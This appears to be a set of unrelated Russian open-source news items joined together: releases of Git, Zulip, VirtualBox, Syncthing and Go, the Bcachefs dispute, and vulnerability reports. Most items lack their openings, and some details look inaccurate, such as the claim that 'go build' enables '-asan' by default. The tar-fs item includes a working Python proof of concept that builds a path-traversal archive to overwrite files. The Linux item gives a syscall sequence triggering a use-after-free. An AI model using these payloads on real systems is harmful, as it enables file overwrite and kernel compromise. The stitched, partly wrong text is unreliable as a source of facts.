По сравнению с прошлым выпуском в новую версию принято 506 изменений, подготовленных при участии 91 разработчика (21 впервые приняли участие в разработке Git). Основные новшества (1, 2, 3):

• Повышена производительность команд "git push" и "git fetch" в репозиториях с большим числом ссылок. Ускорение обеспечено за счёт обновления ссылок в пакетном режиме, в котором в одной транзакции обрабатывается сразу несколько ссылок, вместо создания отдельной транзакции для обновления каждой ссылки. Оптимизация существенно увеличила скорость работы бэкенда "reftable", которые теперь обгоняет по производительности бэкенд "files" Например, в тестовом репозитории с 10 тысячами ссылок производительность "git fetch" при использовании бэкенда "reftable" увеличилась в 22 раза, а при использовании бэкенда "files" - в 1.25 раза. Для "git push" прирост составил 18 и 1.21 раз, соответственно.
• Предложен новый метод упаковки в pack-файлах частей репозитория, не связанных с отслеживанием недостижимых объектов, на которые в репозитории отсутствуют ссылки (не ссылаются ветки или теги). Информация о недостижимых объектах хранится в отдельных pack-файлах ("cruft packs"), что приводило к необходимости их отражения в многопакетных индексах MIDX (multi-pack index) для охвата объектов, которые изначально были недостижимы и хранились только в cruft-пакете, но затем стали достижимы после ссылающегося на них коммита.

  В новой версии при переупаковке pack-файлов обеспечено сохранение дополнительных копий достижимых объектов, хранимых только cruft-файлах. Подобное изменение гарантирует, что в наборе pack-файлов, используемых для хранения достижимых объектов, не содержится объектов, ссылающихся на другие объекты, хранимые вне этого набора. Для исключения из многопакетных индексов (MIDX) недостижимого содержимого cruft-файлов предложена настройка "repack.MIDXMustContainCruft", позволяющая заметно сократить размер подобных индексов. Включение настройки в репозитории GitHub позволило сократить размер MIDX-индексов на 38%, ускорить запись в MIDX-индексы на 35% и повысить производительность чтения на 5%.

• В команду "git pack-objects" добавлена опция "--path-walk", включающая новый метод сбора информации об объектах при переупаковке pack-файлов. Вместо обхода объектов в порядке ревизий, при использовании режима "--path-walk" объекты перебираются через обход файловых путей, что позволяет разом упаковывать все объекты с одним и тем же файловым путём. Подобный подход даёт возможность исключить эвриситку, использующую хэширование для определения связи объекта с его файловым путём, а также избавиться от сортировки объектов перед упаковкой. При использовании режима "--path-walk" размер генерируемых pack-файлов получается значительно меньше, чем при группировке объектов при помощи хэшей.
• Определён формат для обмена сохранёнными состояниями рабочего дерева и индексов в репозитории, создаваемыми при помощи команды "git stash". Новый формат позволяет кодировать сохранённые изменения (stash-записи) в виде последовательности коммитов. Для импорта и экспорта предложены подкоманды "git stash import" и "git stash export", которые можно использовать для переноса сохранённых состояний с одной системы на другую и выполнения операций push или pull с этими состояниями как с обычными ветками или тегами.

  
     git stash export --to-ref refs/stashes/my-stash
     git push origin refs/stashes/my-stash
     ...
     git fetch origin '+refs/stashes/*:refs/stashes/*'
     git stash import refs/stashes/my-stash
  

• В команде "git cat-file", выводящей содержимое заданных объектов, при использовании опций "--batch" и "--batch-check" реализована возможность отображения информации об отсутствующих объектах (например, из-за повреждения репозитория) и субмодулях. Ранее при указании пути у субмодулю команда "git cat-file --batch-check" выводила "missing", а теперь покажет идентификатор объекта.
• В команде "git log" задействованы оптимизации на основе фильтров Блума для ускорения поиска в истории изменений при указании фильтров с несколькими файловыми путями, например, "git log -- path/to/a path/to/b".
• Стабилизированы команды "git switch" и "git restore", которые с 2019 года рассматривались как экспериментальные. Команды преподносятся как современные эквиваленты "git checkout", разделяющие такие малосвязанные возможности данной команды, как манипуляция ветками (переключение и создание) и восстановление файлов в рабочем каталоге.
• Объявлена устаревшей и намечена к удалению в ветке Git 3.0 команда "git whatchanged", эквивалентная "git log --raw".
• В команду "git for-each-ref" добавлена опция "--start-after", которая может применяться совместно с опцией "--count" для организации постраничного вывода.
• В команды "git merge" и "git pull" добавлена опция "--compact-summary" для использования компактного формата сводной информации об изменениях вместо формата diffstat.
• В кодовой базе Git разрешено использование ключевого слова "bool", появившегося в стандарте C99. Также документированы некоторые возможности C99, экспериментально используемые в Git (например, в середине 2026 года планируют разрешить применение конструкций "(struct foo){ .member = value };"). Компилятор с поддержкой C99 является обязательным для Git c 2021 года, но возможности спецификации C99 внедряются крайне осторожно для сохранения совместимости с компиляторами, лишь частично поддерживающими данный стандарт.
• В правила приёма патчей внесены изменения, разрешающие отправку патчей под псевдонимом, а не только под настоящим именем разработчика. Изменение соответствует правилам приёма патчей в ядро Linux.
• Обновлён список нарушающих совместимость изменений, которые будут применены в ветке Git 3.0. Из значительных изменений в предстоящем выпуске Git 3.0 отмечается переход по умолчанию на идентификаторы объектов на основе алгоритма хэширования SHA-256 при инициализации новых репозиториев и задействование формата "reftable" для хранения в репозитории ссылок на ветки и теги (задействовано блочное хранилище от проекта JGit, оптимизированное для хранения очень большого числа ссылок).

1. OpenNews: Уязвимости в Git, допускающие выполнение кода при обращении к внешнему репозиторию
2. OpenNews: Выпуск системы управления исходными текстами Git 2.50
3. OpenNews: Уязвимость в MCP-сервере GitHub, приводящая к утечке информации из приватных репозиториев
4. OpenNews: Доступна децентрализованная система отслеживания ошибок git-bug 0.9
5. OpenNews: Обновление Git с устранением уязвимостей

Проблеме присвоен критический уровень опасности c учётом того, что пакет tar-fs имеет 23 миллиона загрузок в неделю и используется как зависимость в 1155 проектах. Уязвимость устранена в выпусках 3.0.9, 2.1.3 и 1.16.5, которые были сформированы в мае, но информация об уязвимости раскрыта лишь спустя почти 3 месяца.

Уязвимость вызвана недостаточными проверками имеющихся в архиве символических и жёстких ссылок на предмет их выхода за пределы целевого каталога для распаковки. Для обхода проверок применяются две символические ссылки: первая указывает на корневой каталог распаковки архива ("."), а вторая создаётся относительно первой символической ссылки и использует в имени символы "../" для выхода за пределы базового каталога. Например, первая ссылка "noop/noop/noop" указывает на ".", а вторая "noop/noop/noop/../../../" раскрывается как "./../../../". Для организации перезаписи файлов в архиве может быть создана жёсткая ссылка, ссылающаяся на внешний файл относительно второй символической ссылки.

import tarfile
import io
with tarfile.open("poc.tar", mode="x") as tar:
    root = tarfile.TarInfo("root")
    root.linkname = ("noop/" * 15) + ("../" * 15)
    root.type = tarfile.SYMTYPE
    tar.addfile(root)
    noop = tarfile.TarInfo("noop")
    noop.linkname = "."
    noop.type = tarfile.SYMTYPE
    tar.addfile(noop)
    hard = tarfile.TarInfo("hardflag")
    hard.linkname = "root/home/username/flag/flag"
    hard.type = tarfile.LNKTYPE
    tar.addfile(hard)
    content = b"overwrite\n"
    overwrite = tarfile.TarInfo("hardflag")
    overwrite.size = len(content)
    overwrite.type = tarfile.REGTYPE
    tar.addfile(overwrite, fileobj=io.BytesIO(content))
    content = b"new!\n"
    newfile = tarfile.TarInfo("root/home/username/flag/newfile")
    newfile.size = len(content)
    newfile.type = tarfile.REGTYPE
    tar.addfile(newfile, fileobj=io.BytesIO(content))

Похожая уязвимость (CVE-2025-55188) выявлена в архиваторе 7-Zip. Для записи файлов вне базового каталога в 7-Zip также могут использоваться символические ссылки, имеющие последовательность "../" в файловом пути. Проблема может быть эксплуатирована при распаковке при помощи 7-Zip любых архивов, поддерживающих символические ссылки, например, zip, tar, 7z и rar. Проблема устранена в версии 7-Zip 25.01.

1. OpenNews: Уязвимость в Python-модуле TarFile, допускающая запись в любые части ФС
2. OpenNews: Уязвимость в KDE Ark, позволяющая перезаписать файлы при открытии архива
3. OpenNews: Уязвимость в unrar, позволяющая перезаписать файлы при распаковке архива
4. OpenNews: Уязвимость Zip Slip, затрагивающая библиотеки для распаковки архивов
5. OpenNews: Уязвимость в GNU tar, позволяющая перезаписать сторонние файлы

Система поддерживает как прямой обмен сообщениями между двумя людьми, так и проведение групповых обсуждений. Zulip можно сравнить с сервисом Slack и рассматривать как внутрикорпоративный аналог Twitter, применяемый для общения и обсуждений рабочих вопросов в больших группах сотрудников. Предоставляются средства для отслеживания состояния и участия одновременно в нескольких обсуждениях с использованием нитевидной модели отображения сообщений, которая является оптимальным компромиссом между привязкой к комнатам в Slack и единым публичным пространством Twitter. Одновременное нитевидное отображение всех обсуждений позволяет в одном месте охватить все группы, при этом сохранив логическое разделение между ними.

Из возможностей Zulip также можно отметить поддержку отправки сообщений пользователю в offline-режиме (сообщения будут доставлены после появления в online), сохранение полной истории обсуждений на сервере и средства для поиска в архиве, возможность отправки файлов в режиме Drag-and-drop, автоматическую подсветку синтаксиса для передаваемых в сообщениях блоков кода, встроенный язык разметки для быстрого оформления списков и форматирования текста, средства для групповой отправки уведомлений, возможность создания закрытых групп, интеграция с Trac, Nagios, Github, Jenkins, Git, Subversion, JIRA, Puppet, RSS, Twitter и другими сервисами, средства для привязки к сообщениям наглядных меток.

Основные новшества:

• Добавлена функция для напоминания об уже полученном и прочитанном сообщении через указанное пользователем время. Возможно прикрепление к напоминанию произвольного примечания. Функция может использоваться вместо пометки непрочитанным или маркировки звёздочкой в ситуациях, когда нужно отложить сообщение, например, если сейчас нет времени на ответ.
• Добавлена поддержка создания общих чатов (general channels), обсуждение в которых ведётся в общем потоке без разделения на темы.
• Добавлена возможность распределения чат-каналов по папкам. Например, чат-каналы, связанные с проектами, могут быть выделены в отдельные папки, чтобы не смешиваться с другими чатами. В будущих выпусках планируют добавить раздельное управление доступом к папкам.
• Добавлена поддержка просмотра списка недавних тем в чат-каналах для быстрой оценки текущих обсуждений.
• Переделано оформление эскизов видео и изображений. Размер эскизов стал больше, но они по-прежнему остаются второстепенными по сравнению с текстом в ленте сообщений.
• Предоставлена возможность написания текстов сообщений в разные обсуждения, не покидая текущий чат (например, можно быстро написать личное сообщение на обсуждаемую в текущем чате тему).
• При вставке из буфера обмена большого текста теперь можно сконвертировать вставленный текст в файл и отправить его в виде приложенного текстового файла.
• В верхнюю часть левой панели добавлен фильтр для поиска напрямую отправленных сообщений и чат-каналов. Также предоставлена возможность фильтрации тем в зависимости от статуса выполнения обсуждаемой в них задачи (метка "✔"/"выполнено").
• Добавлена поддержка пометки прочитанным всех сообщений в приостановленных или неотслеживаемых темах.
• Предоставлена возможность управления всеми настройками уведомлений, специфичными для чатов, из личной панели настройки уведомлений. Среди прочего, можно настроить собственные уведомления для любого чат-канала.
• Обновлено оформление кнопок и баннеров в интерфейсе настройки.
• Обеспечен показ поисковых рекомендаций рядом с полем ввода поискового запроса.
• Для любой комбинации групп, ролей и пользователей каждого чата разрешено назначение прав на удаление и перемещение тем, а также пометку тем выполненными.
• Добавлена функция для возвращения архивных чатов и деактивированных групп.
• Добавлена поддержка настройки собственного приветствия, отправляемого новым пользователям.
• В сервер добавлена поддержка сквозного шифрования (E2EE) push-уведомлений для мобильных приложений.
• Добавлены модули интеграции с OpenProject и OpenSearch. Улучшена интеграция с GitHub, GitLab и Jotform.
• Обеспечено управление через комбинации клавиш, независимо от активной раскладки клавиатуры и языка.
• Подготовлено новое мобильное приложение для Android и iOS, написанное с использованием фреймворка Flutter (старое мобильное приложение, использовало React Native). Отмечается, что приложение отличается дизайном интерфейса и работает быстрее, но пока отстаёт от старого приложения по функциональности (например, отсутствует сквозное шифрование push-уведомлений).

1. OpenNews: Доступна платформа обмена сообщениями Zulip 10
2. OpenNews: Доступна система обмена сообщениями Briar, способная работать в режиме P2P
3. OpenNews: Проект Revolt развивает открытую альтернативу платформе Discord
4. OpenNews: Проект TFC развивает параноидально защищённую систему обмена сообщениями
5. OpenNews: Завершено открытие серверной части сервиса мгновенного обмена сообщениями Wire

Наиболее заметные изменения:

• В файловом менеджере Dolphin предоставлено два поисковых движка: File Indexing (использует при поиске индекс, формируемый специальным сервисом индексации) и Simple Search (перебирает файлы и каталоги в момент запроса). Переключение между движками осуществляется через кнопку Filter в интерфейсе, показываемом при нажатии Ctrl+F. Для поиска также можно использовать отдельную утилиту KFind.

  В Dolphin также предоставлена возможность вызова из меню "Инструменты" утилиты Filelight для наглядного обзора свободного и занятого места на дисках. В меню, показываемом при нажатии на кнопке выбора режима отображения файлов (View Mode), добавлены опции для включения/выключения показа миниатюр, вывода скрытых файлов, выбора режима сортировки.

  
• Обновлено приложение KRFB, предоставляющее другому пользователю доступ для просмотра действий на рабочем столе текущего пользователя.
• Проведена работа по сокращению потребления ресурсов и повышению стабильности сервиса хранения Akonadi, применяемого в почтовом клиенте, календаре-планировщике, адресной книге и списке задач. По сравнению с прошлым выпуском потребление памяти при работе с различными ресурсами Akonadi снизилось в среднем на 75%. Улучшена интеграция со сторонними закрытыми сервисами аутентификации и совместной работы, такими как Microsoft InTune.
• В календаре-планировщике KOrganizer реализован новый интерфейс выбора даты, позволяющий быстрее выполнять навигацию по датам. Улучшены всплывающие подсказки для поисковых полей.
• В приложении Kleopatra, предоставляющем интерфейс для управления сертификатами и выполнения криптографических операций, реализовано открытие в отдельном окне редактора для написания шифрованных сообщений, вместо использования вкладки. Использование окон позволяет держать открытыми сразу несколько редакторов сообщений.
• В программу для обмена сообщениями Neochat, использующую протокол Matrix, встроена функция для проведения голосований и опросов. Реализовано контекстное меню для отдельных веток сообщений.
• В web-браузере Angelfish, развиваемом для KDE Plasma Mobie, но поддерживающем и работу на больших экранах, добавлена опция для отключения Adblock, а также включены новые комбинации клавиш, такие как "Ctrl + W" для закрытия вкладки и "Ctrl + Shift + O" для перехода к закладкам. Добавлено контекстное меню для быстрой навигации по истории текущей вкладки.

1. OpenNews: Возобновлена разработка окружения KDE Plasma Bigscreen для телевизоров
2. OpenNews: Планы KDE по прекращению поддержки сеанса X11
3. OpenNews: Прогресс в разработке мобильной платформы KDE Plasma Mobile
4. OpenNews: Релиз среды рабочего стола KDE Plasma 6.4
5. OpenNews: Выпуск KDE Gear 25.04, набора приложений от проекта KDE

Основные изменения:

• В графическом интерфейсе глобальные операции перенесены из выпадающего меню в боковую панель, размещённую слева, а инструменты для виртуальных машин перемещены в отдельные вкладки, показываемые над областью с правой панелью.
• В графическом интерфейсе улучшены страницы с настройками. Улучшено управление светодиодными индикаторами на клавиатуре. Из настроек ARM VM убран IO-APIC.
• Для хост-систем на базе Linux добавлена поддержка аппаратного ускорения декодирования видео.
• Для хост-систем на базе macOS и архитектуры ARM добавлена поддержка 3D-ускорения при помощи DXMT.
• В состав открытой кодовой базы перенесён код для эмуляции контроллеров NVMe.
• Налажена работа возможностей для вложенной виртуализации (Nested Virtualization) на CPU Intel.
• Добавлена поддержка виртуализации на хост системах с Windows, использующих процессоры на базе архитектуры ARM.
• Добавлена поддержка запуска гостевых систем с Windows 11 для архитектуры ARM. В наборе дополнений для гостевых систем реализован новый тип ОС - "Windows 11/Arm".
• Нарушена совместимость с состоянием виртуальных машин на базе архитектуры ARM, сохранённым в VirtualBox 7.1, а также сохранёнными снапшотами ARM VM. Перед переходом на ветку VirtualBox 7.2 требуется завершить выполнение подобных виртуальных машин.
• В состав компонентов для хост-систем на базе архитектуры ARM включён web-сервис vboxwebsrv для управления через web-интерфейс.
• В виртуальных машинах на базе архитектуры ARM реализована поддержка ACPI.
• Из числа зависимостей удалены libIDL и IASL.
• На системах, использующих Windows Hyper-V в качестве движка виртуализации, в менеджере виртуальных машин улучшен вывод сведений о возможностях CPU x86_64 и ARM. Добавлена обработка инструкций xsave/xrestor и задействованы расширения набора команд x86_64-v3, такие как AVX и AVX2.
• Улучшена работа транслятора адресов, например, улучшено сохранение настроек виртуальной машины и работа с DNS-серверами, а также унифицировано использование связанного с NAT кода в различных подсистемах.
• В дополнениях для хостов и гостевых систем с Linux добавлена поддержка ядра Linux 6.16 и начальная поддержка 6.17.
• Для гостевых систем с Windows, использующих платформу ARM, добавлен графический драйвер WDDM и реализована поддержка совместных папок (Shared Folder).

1. OpenNews: Обновление VirtualBox 7.1.12
2. OpenNews: Релиз системы виртуализации VirtualBox 7.0
3. OpenNews: На соревновании Pwn2Own в Берлине продемонстрированы взломы RHEL, Firefox, Redis и VirtualBox
4. OpenNews: Релиз системы виртуализации VirtualBox 7.1
5. OpenNews: VirtualBox адаптирован для работы поверх гипервизора KVM

Суть проблемы в том, что клиент может создать очень большое число одновременно обрабатываемых потоков, независимо от лимита SETTINGS_MAX_CONCURRENT_STREAMS, сбрасывая каждый поток на начальном этапе. Подобный сброс приводит к тому, что для отправки нового запроса в установленном соединении HTTP/2 клиенту не требуется ждать ответа от сервера и можно сразу направить большой непрерывный поток запросов, насколько позволяет пропускная способность канала связи.

Клиент перестаёт зависеть от задержек между отправкой запроса и получением ответа (RTT, round-trip time) и может провести атаку с минимальными накладными расходами, при том что сервер продолжает тратить ресурсы на обработку поступающих запросов. Например, сервер осуществляет выделение структур данных под новые потоки, разбор запроса, распаковку заголовка и сопоставление URL с ресурсом. При атаке на обратные прокси, атака может распространиться на бэкенды, на которые прокси успеет перенаправить запрос до его сброса.

Уязвимость напоминает ранее известную проблему Rapid Reset (CVE-2023-44487) и вызвана расхождением логики сброса потоков, определённой в спецификации протокола HTTP/2 и реализованной в конечных продуктах. В спецификации предусмотрена возможность сброса потока клиентом и сервером в любой момент, но во многих реализациях HTTP/2-серверов после подобного сброса запрос продолжает обрабатываться. Ключевым отличием новой атаки является то, что сброс обработки запроса осуществляется по инициативе сервера, а не через отправку клиентом кадра с флагом RST_STREAM.

Сброс по инициативе сервера происходит при поступлении некорректных запросов, но подобные запросы отбрасываются сразу без начала их полноценной обработки и без передачи бэкенду. Для того, чтобы добиться полного цикла обработки запроса атакующий вначале может отправить корректный HTTP-запрос, но следом за ним передать некорректную последовательность управляющих кадров HTTP/2. Подобная активность приведёт к тому, что сервер начнёт полноценно обрабатывать запрос, но потом из-за ошибки при обработке следом идущих кадров сбросит поток (переведёт поток с корректным запросом в состояние RST_STREAM).

Наличие проблемы подтверждено в HTTP-серверах Apache Tomcat, Netty, Eclipse Jetty, Fastly, varnish, lighttpd, h2o, pingora, BIND (в реализации DNS over HTTPS), Zephyr RTOS. Проблема проявляется также на сайтах и серверных сервисах Mozilla. Apache httpd, Apache Traffic Server, Node.js, LiteSpeed, Hyper и HAProxy проблеме не подвержены. Статус наличия уязвимости в nginx не определён.

1. OpenNews: Уязвимость в предлагаемой в Qt реализации протокола HTTP/2
2. OpenNews: Уязвимость в протоколе HTTP/2, задействованная в крупнейшей DDoS-атаке
3. OpenNews: Атака Continuation flood, приводящая к проблемам на серверах, использующих HTTP/2.0
4. OpenNews: RangeAmp - серия атак на CDN, манипулирующая HTTP-заголовком Range
5. OpenNews: Новая атака на системы фронтэнд-бэкенд, позволяющая вклиниться в запросы

Кроме решения задач по синхронизации данных между несколькими устройствами одного пользователя, при помощи Syncthing возможно создание больших децентрализованных сетей для хранения совместно используемых данных, которые распределены по системам участников. Предоставляются средства контроля доступа и создания исключений для синхронизации. Возможно определение хостов, которые будут только получать данные, т.е. изменение данных на этих хостах не будет отражаться на экземплярах данных, хранимых на других системах. Поддерживается несколько режимов версионирования файлов, при которых сохраняются прошлые версии изменившихся данных.

При синхронизации файл логически разбивается на блоки, которые неделимы при передаче данных между системами пользователя. При синхронизации на новое устройство, в случае наличия идентичных блоков на нескольких устройствах, копирование блоков производится с разных узлов, по аналогии с работой системы BitTorrent. Чем больше устройств участвуют в синхронизации, тем быстрее будет проходить репликация новых данных за счёт распараллеливания. В процессе синхронизации изменённых файлов, по сети передаются только изменившиеся блоки данных, а при переименовании или изменении прав доступа синхронизируются только метаданные.

Каналы передачи данных формируются при помощи TLS, все узлы аутентифицируют друг друга по сертификатам и идентификаторам устройств, для контроля целостности применяется SHA-256. Для определения узлов синхронизации в локальной сети может быть использован протокол UPnP, при котором не требуется ручной ввод IP-адресов синхронизируемых устройств. Для настройки системы и мониторинга предусмотрен встроенный web-интерфейс, CLI-клиент и GUI на базе библиотеки GTK, в котором дополнительно предоставляются средства управления узлами синхронизации и репозиториями.

Ключевые изменения в новой ветке:

• Бэкенд хранения переведён с БД LevelDB на SQLite. Миграция данных производится автоматически при первом запуске после обновления. Предполагается, что использование SQLite упростит сопровождение и анализ данных, а также сократит число ошибок.
• Изменён формат ведения логов, которые теперь формируются в структурированном виде (сообщение + параметры в формате ключ-значение). Добавлен новый уровень логов - WARNING, который не столь подробен как INFO, но охватывает больше информации по сравнению с уровнем ERROR. Предоставлена возможность назначать разные уровни логов разным пакетам.
• Прекращено вечное хранение удалённых элементов в БД, подобные элементы теперь удаляются через 6 месяцев (время можно изменить через опцию "--db-delete-retention-interval".
• Улучшен код для разбора опций командной строки и прекращена поддержка устаревшего формата с одним тире (т.е. вместо "-home" следует указывать "--home"). Переименованы или переведены в разряд подкоманд некоторые опции.
• Прекращено создание каталога по умолчанию при первом запуске.
• Задействована установка нескольких сетевых соединений между устройствами, использующими Syncthing 2.x. По умолчанию создаётся три соединения - одно для метаданных индекса и два для обмена данными.
• Изменён алгоритм разрешения конфликтов в ситуации удаления файлов.
• Из-за сложностей кросс-компиляции SQLite прекращена сборка готовых исполняемых файлов для платформ dragonfly/amd64, illumos/amd64, solaris/amd64, linux/ppc64, netbsd/*, openbsd/386, openbsd/arm и windows/arm.

1. OpenNews: Выпуск P2P-системы синхронизации файлов syncspirit 0.4.1, совместимой с Syncthing
2. OpenNews: Выпуск открытой P2P-системы синхронизации файлов Syncthing 1.16
3. OpenNews: Выпуск Venus 0.9, реализации платформы хранения FileCoin
4. OpenNews: Опубликована P2P-платформа GNUnet 0.20
5. OpenNews: Выпуск Nebula 1.9, системы для создания оверлейных P2P-сетей

Синтаксис Go основан на привычных элементах языка Си с отдельными заимствованиями из языка Оберон. Язык достаточно лаконичен, но при этом код легко читается и воспринимается. Код на языке Go компилируется в обособленные бинарные исполняемые файлы, выполняемые нативно, без использования виртуальной машины (модули профилирования, отладки и другие подсистемы выявления проблем на этапе выполнения интегрируются в виде runtime-компонентов), что позволяет добиться производительности, сопоставимой с программами на языке Си.

Проект изначально разрабатывается с оглядкой на многопоточное программирование и эффективную работу на многоядерных системах. Например, на уровне операторов реализованы средства для организации параллельных вычислений и взаимодействия между параллельно выполняемыми методами. Язык также предоставляет встроенные средства защиты от выхода за границы буфера и обеспечивает возможность использования сборщика мусора.

Среди изменений в новом выпуске:

• Добавлен экспериментальный сборщик мусора "greenteagc", рассчитанный на повышения производительности создания и сканирования мелких объектов. В приложениях, в которых активно применяется сборка мусора, при использовании "greenteagc" отмечается сокращение накладных расходов на сборку мусора на 10—40%.
• Добавлены экспериментальные пакеты encoding/json/v2 и encoding/json/jsontext. Первый пакет включает переработанную высокопроизводительную реализацию пакета encoding/json. Второй пакет предлагает функции для низкоуровневой обработки синтаксиса JSON.
• В состав включён новый пакет testing/synctest для тестирования синхронизации между разными потоками параллельно выполняемого кода.
• В команде "go build" по умолчанию активирована опция "-asan", выполняющая проверку утечек памяти при завершении работы программы.
• В команду "go vet" добавлены новые анализаторы "waitgroup" и "hostport" для проверки некорректного использования sync.WaitGroup.Add и fmt.Sprintf("%s:%d", host, port).
• При вычислении значения GOMAXPROCS теперь не просто выставляется число доступных логических CPU, но и учитываются применяемые в контейнерах ограничения производительности CPU.
• В компиляторе и компоновщике реализована поддержка генерации отладочной информации в формате DWARF5, обеспечивающем более компактное представление данных.

1. OpenNews: Выпуск языка программирования Go 1.24
2. OpenNews: Оценка потребления памяти при одновременном запуске миллиона задач
3. OpenNews: Лидер проекта Go принял решение покинуть пост
4. OpenNews: В инструментарий для языка Go добавлена возможность отслеживания уязвимостей в модулях
5. OpenNews: Google намерен добавить телеметрию в инструментарий для языка Go

Bcachefs — одна из файловых систем Linux, конкурирующая с Btrfs и ZFS, и использующая механизм Copy-on-Write (COW), при котором изменения не приводят к перезаписи данных - новое состояние записывается в новое место, после чего меняется указатель актуального состояния. Исключение Bcachefs из основного дерева ядра усложнит жизнь пользователям, которым придётся полагаться на сторонние сборки или ждать официального возвращения в основную ветку разработки.

Конфликт между Кентом и рядом ключевых мэйнтейнеров продолжается уже несколько лет. По словам участников, дело не столько в технических аспектах или нарушении процедур разработки ядра, сколько в потере доверия. Недавний спор о том, была ли функция journal_rewind исправлением ошибки или новой функциональностью, стала последней каплей и Линус Торвальдс прямо заявил, что для восстановления доверия необходима длительная демонстрация конструктивной работы с другими мэйнтейнерами.

Линус Торвальдс считает, что проблема носит системный характер и касается не только его лично, но и всей группы мейнтейнеров файловых систем и подсистемы виртуальной памяти. Любые обещания "вести себя лучше" недостаточны — нужны реальные доказательства, что взаимодействие с другими разработчиками проходит без конфликтов. По мнению Линуса, это должно происходить, пока Bcachefs будет поддерживаться вне основного дерева ядра.

Кент Оверстрит считает, что Bcachefs уже стабилен и имеет широкую пользовательскую базу. Он уверяет, что соблюдает правила слияния изменений и вносит исправления только в критических случаях. При этом Кент выступает за работающий процесс подготовки релизов, который позволит быстро доставлять исправления пользователям.

Судьба Bcachefs в ближайшей перспективе, по всей видимости, будет связана с его развитием вне основной кодовой базы ядра — через дистрибутивы Linux и сторонние репозитории. Восстановление доверия может занять годы и потребует от Кента активного участия в других проектах ядра и сотрудничества с уважаемыми мэйнтейнерами.

В материале использованы сведения из личной переписки с Линусом и Кентом, которая, к сожалению, не позволяет разглашать более подробные детали.

1. OpenNews: Линус Торвальдс намерен исключить Bcachefs из ядра Linux 6.17
2. OpenNews: Заморозка изменений дискового формата в Bcachefs
3. OpenNews: Автора BcacheFS временно отстранили от разработки ядра Linux из-за нарушения кодекса поведения
4. OpenNews: Линус Торвальдс снова недоволен коммитами в Bcachefs
5. OpenNews: Линус Торвальдс начал сожалеть, что принял Bcachefs в ядро Linux

Помимо ранее не рекомендованных к применению терминов, новые рекомендации предлагают избегать использование следующих слов:

• Sanity Check → validation check, consistency check, logic check, gut check
• Dummy → placeholder, stub, sample
• Hung → stalled, unresponsive
• Native feature/support → core feature/support, built-in feature/support
• Pow-wow → huddle, sync, meeting

Остальные рекомендации по заменам:

• Социальное неравенство
  • Master, slave → primary/main, secondary/replica
  • Owner, master → lead, manager, expert, primary
  • Blacklist/whitelist → deny/allow list, exclusion/inclusion list
  • Black box/white box → closed/open, opaque/transparent
  • Black hat/white hat → malicious hacker/approved hacker, hostile/friendly
• Упоминание гендеров
  • Man hours → labor hours, work hours
  • Manpower → labor, workforce
  • Guys → folks, people, engineers/artists, team
  • Girl/Girls → woman/women (для женщин старше 18 лет)
  • Middleman → middle person, mediator, liaison, go-between
  • he/him/his, she/her/hers → they, them, theirs
• Превосходство над другими
  • Crazy, insane → unpredictable, unexpected, hectic
  • Normal → typical, usual
  • Abnormal → atypical, unusual
• Привязка к возрасту
  • Legacy, Grandfather, grandfathering → flagship, established, rollover, carryover
• Агрессия
  • Crushing it, killing it → elevating, exceeding expectations, excelling

1. OpenNews: Pixar, Adobe, Apple, Autodesk и NVIDIA начали совместное продвижение платформы OpenUSD
2. OpenNews: В состав ядра Linux 5.8 приняты рекомендации по инклюзивной терминологии
3. OpenNews: Google обязал применять инклюзивную терминологию в своих открытых проектах
4. OpenNews: IBM, Linux Foundation, Cisco, Akamai и VMware начали продвижение инклюзивной терминологии
5. OpenNews: Мэйнтейнер драйвера Nouveau сложил полномочия из-за проблем с инклюзивностью в сообществе

После поглощения компанией Microsoft сервис GitHub функционировал как независимое бизнес-подразделение, имеющее собственное руководство, сохранявшее прежнюю философию в отношении построения продуктов и ориентированное на удовлетворение интересов и потребностей разработчиков. По данным издания The Verge, после ухода Томаса Домке, GitHub войдёт в состав новой инженерной группы CoreAI в Microsoft, которую возглавит Джей Парих (Jay Parikh), бывший руководитель Facebook. Группа будет развивать платформы и инструменты для разработчиков, фокусируясь на использовании в них AI.

1. OpenNews: Судебное разбирательство против Microsoft и OpenAI, связанное с генератором кода GitHub Copilot
2. OpenNews: Критика Microsoft после удаления из GitHub прототипа эксплоита для Microsoft Exchange
3. OpenNews: Microsoft успешно завершил сделку по покупке GitHub

Уязвимость вызвана ошибкой в реализации флага MSG_OOB, который можно выставить для сокетов AF_UNIX. Флаг MSG_OOB ("out-of-band") позволяет прикрепить дополнительный байт к отправляемым данным, который получатель может прочитать до получения остальных данных. Данный флаг был добавлен в ядре Linux 5.15 по запросу Oracle и в прошлом году предлагался для перевода в разряд устаревших, как не получивший широкого распространения.

В реализации sandbox-окружения Chrome разрешены операции с UNIX-сокетами и системные вызовы send()/recv(), в которых флаг MSG_OOB допускался наряду c другими опциями и не был отдельно отфильтрован. Ошибка в реализации MSG_OOB позволяла добиться обращения к памяти после её освобождения (use-after-free) после выполнения определённой последовательности системных вызовов:

   char dummy;
   int socks[2];
   socketpair(AF_UNIX, SOCK_STREAM, 0, socks);
   send(socks[1], "A", 1, MSG_OOB);
   recv(socks[0], &dummy, 1, MSG_OOB);
   send(socks[1], "A", 1, MSG_OOB);
   recv(socks[0], &dummy, 1, MSG_OOB);
   send(socks[1], "A", 1, MSG_OOB);
   recv(socks[0], &dummy, 1, 0);
   recv(socks[0], &dummy, 1, MSG_OOB);

1. OpenNews: Удалённая уязвимость в модуле ksmbd ядра Linux, выявленная при помощи AI
2. OpenNews: Уязвимость в ядре Linux, позволяющая повысить свои привилегии через VSOCK
3. OpenNews: Инженер из AMD предложил упростить в ядре Linux управление блокировками уязвимостей CPU
4. OpenNews: 0-day уязвимость в драйвере n_gsm, позволяющая выполнить код на уровне ядра Linux
5. OpenNews: Уязвимости в ядре Linux, позволяющие поднять свои привилегии через nf_tables и ksmbd

СУБД Redis поддерживает транзакции, позволяющие выполнить за один шаг группу команд, гарантируя непротиворечивость и последовательность (команды от других запросов не могут вклиниться) выполнения заданного набора команд, а в случае проблем позволяя откатить изменения. Все данные в полном объёме кэшируются в оперативной памяти. Клиентские библиотеки доступны для большинства популярных языков, включая Perl, Python, PHP, Java, Ruby и Tcl.

Для управления данными предоставляются такие команды, как инкремент/декремент, стандартные операции над списками и множествами (объединение, пересечение), переименование ключей, множественные выборки и функции сортировки. Поддерживается два режима хранения: периодическая синхронизация данных на диск и ведение на диске лога изменений. Во втором случае гарантируется полная сохранность всех изменений. Возможна организация master-slave репликации данных на несколько серверов, осуществляемая в неблокирующем режиме. Доступен также режим обмена сообщениями "публикация/подписка", при котором создаётся канал, сообщения из которого распространяются клиентам по подписке.

